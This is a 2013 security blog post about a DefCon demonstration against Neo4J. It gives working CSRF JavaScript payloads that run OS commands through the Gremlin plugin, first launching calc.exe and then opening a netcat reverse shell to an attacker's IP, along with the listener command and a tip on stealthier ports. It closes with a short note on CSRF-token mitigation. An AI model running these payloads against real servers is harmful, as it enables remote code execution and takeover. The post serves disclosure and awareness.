Neo4J CSRF payload to start processes calc and nc on the server
By Dinis Cruz Blog, 2013-08-06 at 04:35:40
Presentation:

The first demo that we showed at the DefCon REST presentation was how to use CSRF to exploit the Neo4J remote code execution feature provided by Groovy. The reason CSRF was used is that, by default, the REST API that allows the web UI to pass a Groovy script is only available on localhost.

Abe and Alvaro's concern, and the reason we showed this in action, is that a considerable number of Neo4J admins fail to read the guidance provided here: http://docs.neo4j.org/chunked/stable/security-server.html

[image: the Neo4J "Securing access to the Neo4j Server" documentation page]

especially this section:

[image: the relevant section of that page]

As you can see in the draft notes about this image, there are at least two REST APIs that can be used to execute Java commands.

Starting calc on the server

Here is the CSRF exploit scenario: the Neo4J admin is exposed via email, Twitter, Reddit, RSS feed, etc. to a link pointing to a page that looks like this:

[image: the attacker's page as seen by the victim]

Inside that page there is this payload:

    function() {
        var url = 'http://localhost:7474/db/data/ext/GremlinPlugin/graphdb/execute_script';
        var script = "import java.lang.Runtime; rt = Runtime.getRuntime(); rt.exec('c:\\\\Windows\\\\System32\\\\calc.exe')";
        var data = JSON.stringify({ script: script, params: {} });
        var success = function() { $('h2').html('Class XmlDecoder with some extra juice'); };
        $.ajax({ type: 'POST', url: url, data: data, contentType: 'application/json', success: success });
    }

Here is a quick description of what happens when the page loads:

- jQuery is loaded into the page (since it was not there)
- a callback function is set to be executed when the page loads
- a JSON POST request is sent to http://localhost:7474/db/data/ext/GremlinPlugin/graphdb/execute_script with the post data

      {"script": "import java.lang.Runtime; rt = Runtime.getRuntime(); rt.exec('c:\\\\Windows\\\\System32\\\\calc.exe')", "params": {}}

  which is basically a JSON way of saying "Hey server, can you execute this Groovy script for me":

      import java.lang.Runtime; rt = Runtime.getRuntime(); rt.exec('c:\\Windows\\System32\\calc.exe')

- finally, as you have probably guessed, that is a simplified Java code snippet to start a new process on the server, in this case calc.exe

Note: as a visual clue that the exploit worked, I also set up a jQuery Ajax onSuccess callback function to change the text of an H2 HTML tag.

Sending a reverse shell into an external box

Since we were at DefCon, which is mostly about exploitation, I also showed the cool trick of sending a reverse shell to the attacker's computer using nc (NetCat). Here is the set-up to create this reverse shell:

- on the attacker's box (VM Fusion on OSX) execute: nc -l 1234
- change the CSRF payload to:

      function() {
          var url = 'http://localhost:7474/db/data/ext/GremlinPlugin/graphdb/execute_script';
          var script = "import java.lang.Runtime; rt = Runtime.getRuntime(); rt.exec('..\\\\..\\\\nc.exe -e cmd.exe 192.168.213.1 1234')";
          var data = JSON.stringify({ script: script, params: {} });
          var success = function() { $('h2').html('Class XmlDecoder with some even more extra juice'); };
          $.ajax({ type: 'POST', url: url, data: data, contentType: 'application/json', success: success });
      }

- and open the link on the victim's Windows VM

As you saw in the previous description, this AJAX request triggers the server-side execution of:

    ..\..\nc.exe -e cmd.exe 192.168.213.1 1234

If you are not that familiar with NetCat (nc), here is what that command does:

- nc.exe starts NetCat
- -e cmd.exe starts cmd.exe and binds the cmd.exe process OutputStream to the NetCat process InputStream, and the cmd.exe process InputStream to the NetCat process OutputStream
- 192.168.213.1 is the IP address of the attacker's server
- 1234 is the port on the attacker's IP, which could be set to 80 or 443 to try to make the attack stealthier

When a feature is a vulnerability

This case is interesting because the capability to run Java commands on the server is a big feature that comes by default with Neo4J, which means that this feature is part of what makes Neo4J popular, and there is little chance it will be removed. The solution, then, is to add a unique token to the request.
For a code sample of what that looks like, take a look at this TeamMentor article on Cross-Site Request Forgery (CSRF) Prevention Using Plain Java Server Pages (JSP); see also these 11 CSRF-related articles.